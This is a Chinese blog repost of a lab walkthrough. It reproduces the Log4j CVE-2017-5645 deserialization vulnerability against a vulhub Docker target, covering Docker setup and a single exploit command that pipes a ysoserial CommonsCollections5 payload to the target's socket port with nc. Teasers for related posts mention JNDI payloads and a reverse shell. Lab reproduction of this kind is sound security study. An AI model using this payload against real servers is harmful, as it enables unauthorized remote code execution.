1. Toy模板网首页
  2. > Toy博客

log4j复现之CVE-2017-5645

9月前 作者:山川绿水 分类:Toy博客 阅读(43) 违法举报

这篇具有很好参考价值的文章主要介绍了log4j复现之CVE-2017-5645。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

log4j复现之CVE-2017-5645

一、靶机环境的安装

1.docker环境安装
apt-get update  
apt-get install -y apt-transport-https ca-certificates
apt install docker.io
apt-get install python3-pip 
pip3 install docker-compose
docker-compose -v
2.下载vlnhub
git clone https://gitee.com/puier/vulhub.git

由于网络原因,直接到官网去下,得到的压缩文件,然后对其解压即可。文章来源地址https://www.toymoban.com/news/detail-575178.html

二、编译启动靶机

对靶场进行编译:docker-compose build
运行靶场:docker-compose up -d

三、漏洞利用

1.到官网下载ysoserial-all.jar文件
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/success" | nc 192.168.6.133 4712
2.注意运行的Java环境是1.7

到了这里,关于log4j复现之CVE-2017-5645的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • ctfshow-Log4j复现-log4j复现

    ctfshow-Log4j复现-log4j复现

    1、买VPS,打开mobax进行ssh连接,开两个终端 一个终端开启监听 另一个终端进入JNDIExploit-1.2-SNAPSHOT.jar所在的目录jndiexploit执行下面命令 生成payload 构造payload 输入进去之后看结果 反弹shell成功 结束

    2024年02月12日
    浏览(54)
  • 网络安全 log4j漏洞复现

    网络安全 log4j漏洞复现

    前言: log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。 漏洞描述: 由于Apache Log4j存在递归解析功能,未取得身份认证的用户,可以从远程发送数据请求输入数据日志,轻松触发漏洞,最

    2024年02月09日
    浏览(62)
  • CVE-2021-44228 Apache log4j 远程命令执行漏洞

    CVE-2021-44228 Apache log4j 远程命令执行漏洞

    一、漏洞原理 log4j(log for java)是由Java编写的可靠、灵活的日志框架,是Apache旗下的一个开源项目,使用Log4j,我们更加方便的记录了日志信息,它不但能控制日志输出的目的地,也能控制日志输出的内容格式;通过定义不同的日志级别,可以更加精确的控制日志的生成过程,

    2024年02月08日
    浏览(56)
  • [CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)

    [CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)

    刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。 影响版本:log4j 2.x = 2.14.1 漏洞简介 首先肯定得简单了解一下log4j2到底是什么东西,log4j2是Apache的

    2024年02月08日
    浏览(40)
  • log4j官方漏洞修复史(更新至2.17.1/CVE-2021-44832)

    log4j官方漏洞修复史(更新至2.17.1/CVE-2021-44832)

    自从log4j2.14.1版本爆出漏洞后,官方截止目前为止,共发布了3个稳定版本,分别是15.0、16.0、17.0。 本篇文章就分析一下每个版本都做了哪些事情,以此来评估每个版本升级的必要性。 分割线--------------------------------------------------------------------------------------- 在28号晚上,log4

    2024年02月07日
    浏览(61)
  • JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

    JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

    1.首先搭建log4j靶场 2.开启服务 Windows攻击端执行以下命令 java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1 再开一个cmd可以看下能用什么payload java -jar JNDIExploit-1.2-SNAPSHOT.jar -u 以上payload都可以尝试,我们使用 ldap://null:1389/TomcatBypass/TomcatEcho 3.构造请求 ${jndi:ldap://192.168.155.2

    2024年02月09日
    浏览(46)
  • 【实战】一次简单的log4j漏洞测试

    【实战】一次简单的log4j漏洞测试

    更新时间:2021.12.19 参考文档:https://www.yuque.com/u8021480/crow/dg9xax 在去年 log4j 漏洞刚爆发的时候,很多平台都存在漏洞,当时也在第一时间在有授权的情况下对某论坛进行了渗透测试,结果发现存在漏洞,报告之后,漏洞也被很快修复。 本次对该渗透过程进行一个简单的记录

    2023年04月26日
    浏览(50)
  • Log4j2 - JNDI 注入漏洞复现(CVE-2021-44228)

    Log4j2 - JNDI 注入漏洞复现(CVE-2021-44228)

    Apache log4j 是 Apache 的一个开源项目, Apache log4j2 是一个 Java 的日志记录工具。该工具重写了 log4j 框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 l

    2024年02月07日
    浏览(41)
  • 复现CVE-2021-44228-Apache Log4j2远程代码执行漏洞

    复现CVE-2021-44228-Apache Log4j2远程代码执行漏洞

    复现CVE-2021-44228-Apache Log4j2远程代码执行漏洞 目录 前言 漏洞原理 影响范围 环境搭建漏洞复现 使用工具JNDIExploit-1.2-SNAPSHOT.jar 近期Apache Log4j2被暴露了一个严重的远程代码执行安全漏洞(CVE-2021-44228),有严重的安全风险。Apache Log4j2是一款优秀的Java日志框架, 被广泛地应用在

    2024年02月05日
    浏览(45)
  • log4j2漏洞CVE-2021-44228复现笔记(纯步骤过程,没有复杂的知识点)

    log4j2漏洞CVE-2021-44228复现笔记(纯步骤过程,没有复杂的知识点)

    前言: Apache Log4j 2 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。 2021 年 12 月,在 Apache Log4j2 中发现了一个 0-day 漏洞。Log4j 的 JNDI 支持并没有限制可以解析的名称。一些协议像rmi:和ld

    2024年02月12日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包